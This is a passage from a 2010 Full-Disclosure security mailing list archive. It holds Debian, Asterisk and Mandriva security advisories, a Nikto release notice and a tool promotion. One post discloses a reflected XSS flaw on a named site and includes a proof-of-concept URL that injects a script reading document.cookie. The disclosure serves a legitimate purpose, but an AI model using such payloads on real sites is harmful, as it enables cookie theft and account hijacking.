http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.19-5+lenny1_hppa.deb Size/MD5 checksum: 344566 a1f7945e7669baab86ee22ad8c270275 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.19-5+lenny1_hppa.deb Size/MD5 checksum: 72596 8801ff2ad9825a19080b28a179db2a2c http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.19-5+lenny1_hppa.deb Size/MD5 checksum: 72274 a963dffdf5a1fc63c7bf77a72c648281 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.19-5+lenny1_i386.deb Size/MD5 checksum: 70344 8bb71db1240fd4bd184b40f02f1c7e7f http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.19-5+lenny1_i386.deb Size/MD5 checksum: 67620 9e96f0749268f09040d2f652be153bf9 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.19-5+lenny1_i386.deb Size/MD5 checksum: 307526 aab501e0974a424c0425940ab626e10a http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.19-5+lenny1_i386.deb Size/MD5 checksum: 66232 f36ccf5b0c2baa706dcadecb903798f3 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.19-5+lenny1_i386.deb Size/MD5 checksum: 78516 48a3439e5040f4196a90ee12375b4169 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.19-5+lenny1_i386.deb Size/MD5 checksum: 70728 cef82eb0a5c4dbbaa7d9ec7b6f32f64f ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.19-5+lenny1_ia64.deb Size/MD5 checksum: 75032 0feeb83f5aa7bed9b4d2360c5a6f8949 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.19-5+lenny1_ia64.deb Size/MD5 checksum: 431260 bf91f89bea8fb52ec2d5f82936dd339f http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.19-5+lenny1_ia64.deb Size/MD5 checksum: 84588 5750453439d8179b6b19d395c2badcb7 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.19-5+lenny1_ia64.deb Size/MD5 checksum: 75120 7a79e798a92e177a0777efab027b2965 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.19-5+lenny1_ia64.deb Size/MD5 checksum: 68738 a2ff868b888959304b0247cc3041fd2e http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.19-5+lenny1_ia64.deb Size/MD5 checksum: 70900 b2078fff9fd573f47d518d9c7c25246e mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.19-5+lenny1_mips.deb Size/MD5 checksum: 71286 e8938e2d1f10d15fbd4922df02bab53d http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.19-5+lenny1_mips.deb Size/MD5 checksum: 71130 023737adef682d577aedc0af2e249835 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.19-5+lenny1_mips.deb Size/MD5 checksum: 313018 5e103d0333acdc2593a4eed7dfbce519 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.19-5+lenny1_mips.deb Size/MD5 checksum: 78070 074c3f59881fe200ed22dc4d058ab614 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.19-5+lenny1_mips.deb Size/MD5 checksum: 68284 1ee640d812322c7543fa5bb06e53d0e8 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.19-5+lenny1_mips.deb Size/MD5 checksum: 66868 ed578b54e85963ac73976c06183c1c45 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.19-5+lenny1_powerpc.deb Size/MD5 checksum: 70770 07cc5ff5c4138b439fcff9ff4eac68cf http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.19-5+lenny1_powerpc.deb Size/MD5 checksum: 69084 2d44c22a09148940548988b3e8c86559 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.19-5+lenny1_powerpc.deb Size/MD5 checksum: 81682 1925dbe33db2672e17c81f913f6b0154 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.19-5+lenny1_powerpc.deb Size/MD5 checksum: 366542 0be13715b3501ab061949f68c5d23fc1 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.19-5+lenny1_powerpc.deb Size/MD5 checksum: 74296 cb0e45885b017c2579f322a2aaa9c9bd http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.19-5+lenny1_powerpc.deb Size/MD5 checksum: 73892 5cea3a9b840550f56f0779ad7a2fd571 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.19-5+lenny1_s390.deb Size/MD5 checksum: 330222 88f47f047aaecb07956f2d3026c3a59b http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.19-5+lenny1_s390.deb Size/MD5 checksum: 79152 bc3f4103c80fa0e6cf0c6b8dd2469da8 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.19-5+lenny1_s390.deb Size/MD5 checksum: 72406 0fe4bb1bba1d9fc7182c6867b6c993da http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.19-5+lenny1_s390.deb Size/MD5 checksum: 67152 bd416352fdb89e3f75b03606c9537ca4 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.19-5+lenny1_s390.deb Size/MD5 checksum: 68640 fecb92a43b0e9d0c637044e388f74125 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.19-5+lenny1_s390.deb Size/MD5 checksum: 72002 047561ce9696899949940fec802b2a7b sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.19-5+lenny1_sparc.deb Size/MD5 checksum: 71384 67710ff21741d2a70642ae833b087e4a http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.19-5+lenny1_sparc.deb Size/MD5 checksum: 306226 eca87ad74cc54ac577bb2578a1fa8a8a http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.19-5+lenny1_sparc.deb Size/MD5 checksum: 71274 5664837eddb3450ba7b159c6ec045ec7 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.19-5+lenny1_sparc.deb Size/MD5 checksum: 68330 f9f0527fd7310a29e4ef5a4b50e079cf http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.19-5+lenny1_sparc.deb Size/MD5 checksum: 66744 516ac0bcd498191e7b55aed5653a000c http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.19-5+lenny1_sparc.deb Size/MD5 checksum: 78666 8e757df9377c9e69c33525118d5b4eb5 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAktoCkYACgkQHYflSXNkfP+w1QCfQekDr4soPXVtvcsPZ9s1JCfe eSgAn1lva7YwPNQG96pgRSJavlsT4MXQ =RHiq -----END PGP SIGNATURE----- From reedarvin at gmail.com Tue Feb 2 17:44:45 2010 From: reedarvin at gmail.com (Reed Arvin) Date: Tue, 2 Feb 2010 10:44:45 -0700 Subject: [Full-disclosure] Get WinScanX Pro for FREE or $10 dollars for the month of February Message-ID: <80115b691002020944l443ae030q2c1c05e2d7cc2c83@mail.gmail.com> In an effort to spread the word about WinScanX Pro, one of the best Windows auditing tools around, substantial discounts are being offered for the month of February. ============================= Buy WinScanX Pro for just $10.00 (normally priced at $250.00) WinScanX Pro can potentially scan thousands of hosts in a matter of minutes while WinScanX Basic can only scan one host at a time. For serious auditors and security professionals, efficiency is well worth the price. Buy your copy at: http://windowsaudit.com/winscanx/ ============================= Get WinScanX Pro for FREE! Write a short article about your favorite WinScanX feature and how you use it in your environment and get a copy of WinScanX Pro for FREE. E-mail your articles to: reed at windowsaudit.com ============================= Get WinScanX Basic (scans one host at a time -- always free) Download your copy at: http://windowsaudit.com/winscanx/ From skg102 at gmail.com Tue Feb 2 20:10:22 2010 From: skg102 at gmail.com (rockey killer) Date: Wed, 3 Feb 2010 01:40:22 +0530 Subject: [Full-disclosure] Cross Site Scripting (XSS) Vulnerability in ibibo Message-ID: Cross Site Scripting (XSS) Vulnerability in ibibo In search fields of cityads.ibibo.com ibibo.com is India?s first entertainment and talent based social network. It gives the youth of India a unique platform to showcase their talent, express themselves, create their own social network, audience and fan club and hence get recognition. Vulnerability Non-Persistent Cross site scripting (XSS) vulnerability is found in cityads.ibibo.com Disclosure Timeline Reported: Tue, Jan 19, 2010 at 5:23 PM Fixed: -------------- Credits H4CK3R Crew http://h4ck3r.in POC URL http://cityads.ibibo.com/search_result.php?cate_id=&q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&searchFrom=search_bar -- Rockey Killer It's all about Hacking and Security http://h4ck3r.in/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100203/8a723654/attachment.html From sullo at cirt.net Tue Feb 2 20:19:49 2010 From: sullo at cirt.net (Sullo) Date: Tue, 2 Feb 2010 15:19:49 -0500 Subject: [Full-disclosure] Nikto version 2.1.1 released! Message-ID: I'm happy to announce the immediate availability of Nikto 2.1.1! Nikto is an open source web server scanner which performs comprehensive tests against web servers for multiple items, including over 6100 potentially dangerous files/CGIs, checks for outdated versions of over 950 servers, and version specific problems on over 260 servers In addition to bug fixes, 2.1.1 contains some new functionality, including: - New remote file inclusion (RFI) testing - Over 2300 new RFI tests (courtesy RSnake/OSVDB) - Sending of each test ID in the User-Agent - Libwhisker 2.5, which includes 2 new IDS evasion techniques - Ability to run specific plugins - XML report now includes SSL information See the CHANGELOG.txt file, cirt.net or assembla.com for the full list of changes. Download: http://cirt.net/Nikto2 MD5 Checksums: nikto-2.1.1.tar.bz2 = 4a7ca9634190eba8cac9847117a72446 nikto-2.1.1.tar.gz = a9404c3f464b08f3f48788d5f39e0ca7 As always, feedback, bugs and suggestions welcome. -Sullo -- http://www.cirt.net | http://www.osvdb.org/ From me at b3nji.com Tue Feb 2 20:13:59 2010 From: me at b3nji.com (Benji) Date: Tue, 2 Feb 2010 20:13:59 +0000 Subject: [Full-disclosure] Cross Site Scripting (XSS) Vulnerability in ibibo In-Reply-To: References: Message-ID: <967EFF5B-A787-429A-9DDD-E22B655F7F60@b3nji.com> Xssed.com. That is all. Sent from my iPhone On 2 Feb 2010, at 20:10, rockey killer wrote: > network. From security at asterisk.org Tue Feb 2 22:40:17 2010 From: security at asterisk.org (Asterisk Security Team) Date: Tue, 02 Feb 2010 16:40:17 -0600 Subject: [Full-disclosure] AST-2010-001: T.38 Remote Crash Vulnerability Message-ID: Asterisk Project Security Advisory - AST-2010-001 +------------------------------------------------------------------------+ | Product | Asterisk | |----------------------+-------------------------------------------------| | Summary | T.38 Remote Crash Vulnerability | |----------------------+-------------------------------------------------| | Nature of Advisory | Denial of Service | |----------------------+-------------------------------------------------| | Susceptibility | Remote unauthenticated sessions | |----------------------+-------------------------------------------------| | Severity | Critical | |----------------------+-------------------------------------------------| | Exploits Known | No | |----------------------+-------------------------------------------------| | Reported On | 12/03/09 | |----------------------+-------------------------------------------------| | Reported By | issues.asterisk.org users bklang and elsto | |----------------------+-------------------------------------------------| | Posted On | 02/03/10 | |----------------------+-------------------------------------------------| | Last Updated On | February 2, 2010 | |----------------------+-------------------------------------------------| | Advisory Contact | David Vossel < dvossel AT digium DOT com > | |----------------------+-------------------------------------------------| | CVE Name | CVE-2010-0441 | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Description | An attacker attempting to negotiate T.38 over SIP can | | | remotely crash Asterisk by modifying the FaxMaxDatagram | | | field of the SDP to contain either a negative or | | | exceptionally large value. The same crash occurs when | | | the FaxMaxDatagram field is omitted from the SDP as | | | well. | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Resolution | Upgrade to one of the versions of Asterisk listed in the | | | "Corrected In" section, or apply a patch specified in the | | | "Patches" section. | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Affected Versions | |------------------------------------------------------------------------| | Product | Release Series | | |----------------------------------+----------------+--------------------| | Asterisk Open Source | 1.6.x | All versions | |----------------------------------+----------------+--------------------| | Asterisk Business Edition | C.3 | All versions | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Corrected In | |------------------------------------------------------------------------| | Product | Release | |------------------------------------------+-----------------------------| | Asterisk Open Source | 1.6.0.22 | |------------------------------------------+-----------------------------| | Asterisk Open Source | 1.6.1.14 | |------------------------------------------+-----------------------------| | Asterisk Open Source | 1.6.2.2 | |------------------------------------------+-----------------------------| | | C.3.3.2 | +------------------------------------------------------------------------+ +-------------------------------------------------------------------------+ | Patches | |-------------------------------------------------------------------------| | SVN URL |Branch| |------------------------------------------------------------------+------| |http://downloads.asterisk.org/pub/security/AST-2010-001-1.6.0.diff|v1.6.0| |------------------------------------------------------------------+------| |http://downloads.asterisk.org/pub/security/AST-2010-001-1.6.1.diff|v1.6.1| |------------------------------------------------------------------+------| |http://downloads.asterisk.org/pub/security/AST-2010-001-1.6.2.diff|v1.6.2| +-------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Links | https://issues.asterisk.org/view.php?id=16634 | | | | | | https://issues.asterisk.org/view.php?id=16724 | | | | | | https://issues.asterisk.org/view.php?id=16517 | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Asterisk Project Security Advisories are posted at | | http://www.asterisk.org/security | | | | This document may be superseded by later versions; if so, the latest | | version will be posted at | | http://downloads.digium.com/pub/security/.pdf and | | http://downloads.digium.com/pub/security/.html | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Revision History | |------------------------------------------------------------------------| | Date | Editor | Revisions Made | |----------------+----------------------+--------------------------------| | 02/02/10 | David Vossel | Initial release | +------------------------------------------------------------------------+ Asterisk Project Security Advisory - AST-2010-001 Copyright (c) 2010 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. From jeffwillis30 at gmail.com Tue Feb 2 23:12:49 2010 From: jeffwillis30 at gmail.com (Jeff Williams) Date: Wed, 3 Feb 2010 10:12:49 +1100 Subject: [Full-disclosure] AST-2010-001: T.38 Remote Crash Vulnerability In-Reply-To: References: Message-ID: <64fcd9051002021512m4c15ef9aj33b8a6a9a242212f@mail.gmail.com> You deserve a pwnie award for the worst advisory template. 2010/2/3 Asterisk Security Team > Asterisk Project Security Advisory - AST-2010-001 > > > +------------------------------------------------------------------------+ > | Product | Asterisk > | > > |----------------------+-------------------------------------------------| > | Summary | T.38 Remote Crash Vulnerability > | > > |----------------------+-------------------------------------------------| > | Nature of Advisory | Denial of Service > | > > |----------------------+-------------------------------------------------| > | Susceptibility | Remote unauthenticated sessions > | > > |----------------------+-------------------------------------------------| > | Severity | Critical > | > > |----------------------+-------------------------------------------------| > | Exploits Known | No > | > > |----------------------+-------------------------------------------------| > | Reported On | 12/03/09 > | > > |----------------------+-------------------------------------------------| > | Reported By | issues.asterisk.org users bklang and elsto > | > > |----------------------+-------------------------------------------------| > | Posted On | 02/03/10 > | > > |----------------------+-------------------------------------------------| > | Last Updated On | February 2, 2010 > | > > |----------------------+-------------------------------------------------| > | Advisory Contact | David Vossel < dvossel AT digium DOT com > > | > > |----------------------+-------------------------------------------------| > | CVE Name | CVE-2010-0441 > | > > +------------------------------------------------------------------------+ > > > +------------------------------------------------------------------------+ > | Description | An attacker attempting to negotiate T.38 over SIP can > | > | | remotely crash Asterisk by modifying the FaxMaxDatagram > | > | | field of the SDP to contain either a negative or > | > | | exceptionally large value. The same crash occurs when > | > | | the FaxMaxDatagram field is omitted from the SDP as > | > | | well. > | > > +------------------------------------------------------------------------+ > > > +------------------------------------------------------------------------+ > | Resolution | Upgrade to one of the versions of Asterisk listed in the > | > | | "Corrected In" section, or apply a patch specified in the > | > | | "Patches" section. > | > > +------------------------------------------------------------------------+ > > > +------------------------------------------------------------------------+ > | Affected Versions > | > > |------------------------------------------------------------------------| > | Product | Release Series | > | > > |----------------------------------+----------------+--------------------| > | Asterisk Open Source | 1.6.x | All versions > | > > |----------------------------------+----------------+--------------------| > | Asterisk Business Edition | C.3 | All versions > | > > +------------------------------------------------------------------------+ > > > +------------------------------------------------------------------------+ > | Corrected In > | > > |------------------------------------------------------------------------| > | Product | Release > | > > |------------------------------------------+-----------------------------| > | Asterisk Open Source | 1.6.0.22 > | > > |------------------------------------------+-----------------------------| > | Asterisk Open Source | 1.6.1.14 > | > > |------------------------------------------+-----------------------------| > | Asterisk Open Source | 1.6.2.2 > | > > |------------------------------------------+-----------------------------| > | | C.3.3.2 > | > > +------------------------------------------------------------------------+ > > > +-------------------------------------------------------------------------+ > | Patches > | > > |-------------------------------------------------------------------------| > | SVN URL > |Branch| > > |------------------------------------------------------------------+------| > | > http://downloads.asterisk.org/pub/security/AST-2010-001-1.6.0.diff|v1.6.0| > > |------------------------------------------------------------------+------| > | > http://downloads.asterisk.org/pub/security/AST-2010-001-1.6.1.diff|v1.6.1| > > |------------------------------------------------------------------+------| > | > http://downloads.asterisk.org/pub/security/AST-2010-001-1.6.2.diff|v1.6.2| > > +-------------------------------------------------------------------------+ > > > +------------------------------------------------------------------------+ > | Links | https://issues.asterisk.org/view.php?id=16634 > | > | | > | > | | https://issues.asterisk.org/view.php?id=16724 > | > | | > | > | | https://issues.asterisk.org/view.php?id=16517 > | > > +------------------------------------------------------------------------+ > > > +------------------------------------------------------------------------+ > | Asterisk Project Security Advisories are posted at > | > | http://www.asterisk.org/security > | > | > | > | This document may be superseded by later versions; if so, the latest > | > | version will be posted at > | > | http://downloads.digium.com/pub/security/.pdf and > | > | http://downloads.digium.com/pub/security/.html > | > > +------------------------------------------------------------------------+ > > > +------------------------------------------------------------------------+ > | Revision History > | > > |------------------------------------------------------------------------| > | Date | Editor | Revisions Made > | > > |----------------+----------------------+--------------------------------| > | 02/02/10 | David Vossel | Initial release > | > > +------------------------------------------------------------------------+ > > Asterisk Project Security Advisory - AST-2010-001 > Copyright (c) 2010 Digium, Inc. All Rights Reserved. > Permission is hereby granted to distribute and publish this advisory in > its > original, unaltered form. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100203/6c15183e/attachment.html From kimms at infosec.co.kr Wed Feb 3 00:22:33 2010 From: kimms at infosec.co.kr (=?ks_c_5601-1987?B?sei5q7y6?=) Date: Wed, 3 Feb 2010 09:22:33 +0900 Subject: [Full-disclosure] network security product market trend and forecast, outlook Message-ID: Hello list. I?m looking for information about network security product(firewall,IDS/IPS,VPN,etc.) market trend and forecast, outlook But many of these that I found is all charged information. Not free. Are there free and reliable information? Where? Thank KIM. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20100203/8f9d774e/attachment.html From security at mandriva.com Wed Feb 3 03:06:01 2010 From: security at mandriva.com (security at mandriva.com) Date: Wed, 03 Feb 2010 04:06:01 +0100 Subject: [Full-disclosure] [ MDVSA-2010:031 ] wireshark Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2010:031 http://www.mandriva.com/security/ _______________________________________________________________________ Package : wireshark Date : February 2, 2010 Affected: 2008.0, 2009.1, Corporate 4.0, Enterprise Server 5.0 _______________________________________________________________________ Problem Description: This advisory updates Wireshark to the version 1.0.11, which fixes the following vulnerabilities: The SMB and SMB2 dissectors could crash (CVE-2009-4377). The Infiniband dissector could crash on some platforms (CVE-2009-2563). Several buffer overflows were discovered and fixed in the LWRES dissector. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4377 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2563 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 19efa81835c23a398b2838a12c402cfc 2008.0/i586/dumpcap-1.0.11-0.1mdv2008.0.i586.rpm e2ebbdf9c799d040c484c766f7f77ce1 2008.0/i586/libwireshark0-1.0.11-0.1mdv2008.0.i586.rpm bbdc06654f2ca5508368a09197f68453 2008.0/i586/libwireshark-devel-1.0.11-0.1mdv2008.0.i586.rpm 8c8f6155e041a6ba7eb0151df71c7c1a 2008.0/i586/rawshark-1.0.11-0.1mdv2008.0.i586.rpm 416d3ee9cc690e671f5e3160189048f1 2008.0/i586/tshark-1.0.11-0.1mdv2008.0.i586.rpm 3da636be3451aa0a2033ef0f69e7f7ed 2008.0/i586/wireshark-1.0.11-0.1mdv2008.0.i586.rpm 2f9091cc63e15865664fd600bf8fb04d 2008.0/i586/wireshark-tools-1.0.11-0.1mdv2008.0.i586.rpm b633d55d86c0bd099978f3f120d4a098 2008.0/SRPMS/wireshark-1.0.11-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 082c3a795622b56182e15e709c9a73b0 2008.0/x86_64/dumpcap-1.0.11-0.1mdv2008.0.x86_64.rpm 22d769b9f4f84f50f135274c8549d8fd 2008.0/x86_64/lib64wireshark0-1.0.11-0.1mdv2008.0.x86_64.rpm a7d0323a5f9e6cc3e635e9b1d2a0b3bd 2008.0/x86_64/lib64wireshark-devel-1.0.11-0.1mdv2008.0.x86_64.rpm 08fbf188d625df8afde20da0c4588709 2008.0/x86_64/rawshark-1.0.11-0.1mdv2008.0.x86_64.rpm e7487a6b26627d08f99919a931ad8d15 2008.0/x86_64/tshark-1.0.11-0.1mdv2008.0.x86_64.rpm 3a2cb7625e868de9fc3b8055d8ef1de2 2008.0/x86_64/wireshark-1.0.11-0.1mdv2008.0.x86_64.rpm b497e520ff1893129bd5fa90d4e1cfeb 2008.0/x86_64/wireshark-tools-1.0.11-0.1mdv2008.0.x86_64.rpm b633d55d86c0bd099978f3f120d4a098 2008.0/SRPMS/wireshark-1.0.11-0.1mdv2008.0.src.rpm Mandriva Linux 2009.1: c0ab12b26e58e08c3c945c081bb1ff32 2009.1/i586/dumpcap-1.0.11-0.1mdv2009.1.i586.rpm b9c922ad22775a300623901f4823466c 2009.1/i586/libwireshark0-1.0.11-0.1mdv2009.1.i586.rpm 7f87ebcbf3399007994e48ecacea40e0 2009.1/i586/libwireshark-devel-1.0.11-0.1mdv2009.1.i586.rpm 15a63f395346dfae46dc28fec4b860fc 2009.1/i586/rawshark-1.0.11-0.1mdv2009.1.i586.rpm 939f2a2b5825a4e6090503d35210f439 2009.1/i586/tshark-1.0.11-0.1mdv2009.1.i586.rpm f131365d83d612034736acb8a48331f2 2009.1/i586/wireshark-1.0.11-0.1mdv2009.1.i586.rpm 9fbafa94a8d4a4b128014e2a03d5bf5a 2009.1/i586/wireshark-tools-1.0.11-0.1mdv2009.1.i586.rpm 13c333434f8155ae16934f4030b0d8da 2009.1/SRPMS/wireshark-1.0.11-0.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: a174d15549b6ab6eca1702be93da98f7 2009.1/x86_64/dumpcap-1.0.11-0.1mdv2009.1.x86_64.rpm 54d83f1b9725bc9db4237a7e9ffbda23 2009.1/x86_64/lib64wireshark0-1.0.11-0.1mdv2009.1.x86_64.rpm 45c14304b4a90b7f635d1577d6d0cbf1 2009.1/x86_64/lib64wireshark-devel-1.0.11-0.1mdv2009.1.x86_64.rpm 701a608316a51fc749e755c209ff954b 2009.1/x86_64/rawshark-1.0.11-0.1mdv2009.1.x86_64.rpm 93841b7abedb7a104d02a1b1cc303c27 2009.1/x86_64/tshark-1.0.11-0.1mdv2009.1.x86_64.rpm bed0e094baee8d6ad80f51b5298e1513 2009.1/x86_64/wireshark-1.0.11-0.1mdv2009.1.x86_64.rpm 54c833bb1d0e2308feccceb50a483b14 2009.1/x86_64/wireshark-tools-1.0.11-0.1mdv2009.1.x86_64.rpm 13c333434f8155ae16934f4030b0d8da 2009.1/SRPMS/wireshark-1.0.11-0.1mdv2009.1.src.rpm Corporate 4.0: d1eb7ec4cf71cc97aa61d904a80b5e3e corporate/4.0/i586/dumpcap-1.0.11-0.1.20060mlcs4.i586.rpm a1efc9ed4560444167e1bc579e852cc6 corporate/4.0/i586/libwireshark0-1.0.11-0.1.20060mlcs4.i586.rpm 0948fc7945d83459474fc564981011a6 corporate/4.0/i586/libwireshark-devel-1.0.11-0.1.20060mlcs4.i586.rpm 2ad4fd1474fea1cd3a6d317d17d5ff71 corporate/4.0/i586/rawshark-1.0.11-0.1.20060mlcs4.i586.rpm c45d1716fde523430c0993035f762120 corporate/4.0/i586/tshark-1.0.11-0.1.20060mlcs4.i586.rpm d19e47fb78fd39d67cdabdffc2a85068 corporate/4.0/i586/wireshark-1.0.11-0.1.20060mlcs4.i586.rpm 760989e2d7e418b66355bc63b3d358fa corporate/4.0/i586/wireshark-tools-1.0.11-0.1.20060mlcs4.i586.rpm 9fa54f95ba1ac6139a265bbfc8d127b1 corporate/4.0/SRPMS/wireshark-1.0.11-0.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: c43b4f5e17905bf3e92420b572537a78 corporate/4.0/x86_64/dumpcap-1.0.11-0.1.20060mlcs4.x86_64.rpm 90afae49acdbb872d0e2068eac663c72 corporate/4.0/x86_64/lib64wireshark0-1.0.11-0.1.20060mlcs4.x86_64.rpm 58745ea4d1f3b484678f34c0f42ea7ec corporate/4.0/x86_64/lib64wireshark-devel-1.0.11-0.1.20060mlcs4.x86_64.rpm b604127daebc516779b1709d51a6bdb5 corporate/4.0/x86_64/rawshark-1.0.11-0.1.20060mlcs4.x86_64.rpm 06cf97ba0b2fd291fa4fff0a5e467e37 corporate/4.0/x86_64/tshark-1.0.11-0.1.20060mlcs4.x86_64.rpm d2903cbeedfe11f49fad3e3627550d78 corporate/4.0/x86_64/wireshark-1.0.11-0.1.20060mlcs4.x86_64.rpm 1ca2c1af36c8ff26e15ec0cc71274a05 corporate/4.0/x86_64/wireshark-tools-1.0.11-0.1.20060mlcs4.x86_64.rpm 9fa54f95ba1ac6139a265bbfc8d127b1 corporate/4.0/SRPMS/wireshark-1.0.11-0.1.20060mlcs4.src.rpm Mandriva Enterprise Server 5: d121a5b1d6854048326174d9e6bcedd7 mes5/i586/dumpcap-1.0.11-0.1mdvmes5.i586.rpm b7f17c2f23b86a56505f19229d3127a4 mes5/i586/libwireshark0-1.0.11-0.1mdvmes5.i586.rpm 347b5faa357359bc766874668baa7433 mes5/i586/libwireshark-devel-1.0.11-0.1mdvmes5.i586.rpm e0312c09a741831f029a87ec7b111a16 mes5/i586/rawshark-1.0.11-0.1mdvmes5.i586.rpm 704670f3d68a4ef18998325927c675d7 mes5/i586/tshark-1.0.11-0.1mdvmes5.i586.rpm 5c9aa7ace2318bd60b2c9b1be03de4a3 mes5/i586/wireshark-1.0.11-0.1mdvmes5.i586.rpm 3414f1f520fa7129bca53639339d4427 mes5/i586/wireshark-tools-1.0.11-0.1mdvmes5.i586.rpm 33e3b36192051dcff6c1069bc415f34a mes5/SRPMS/wireshark-1.0.11-0.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: 32b01554823524580d7527e64b6ec1b2 mes5/x86_64/dumpcap-1.0.11-0.1mdvmes5.x86_64.rpm 01f27d99f023bbd83ab110bd12300a9e mes5/x86_64/lib64wireshark0-1.0.11-0.1mdvmes5.x86_64.rpm 3f70c94125aa2297690b936936b32493 mes5/x86_64/lib64wireshark-devel-1.0.11-0.1mdvmes5.x86_64.rpm 08624b3f91f6a8442abc802ec0f24c74 mes5/x86_64/rawshark-1.0.11-0.1mdvmes5.x86_64.rpm 563cd28702d1572e17c6f99fc23178dd mes5/x86_64/tshark-1.0.11-0.1mdvmes5.x86_64.rpm 8af1a674c107ff546a8f28158ef15a9d mes5/x86_64/wireshark-1.0.11-0.1mdvmes5.x86_64.rpm 71f149cc307ee3b026867c2c282216f4 mes5/x86_64/wireshark-tools-1.0.11-0.1mdvmes5.x86_64.rpm 33e3b36192051dcff6c1069bc415f34a mes5/SRPMS/wireshark-1.0.11-0.1mdvmes5.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) 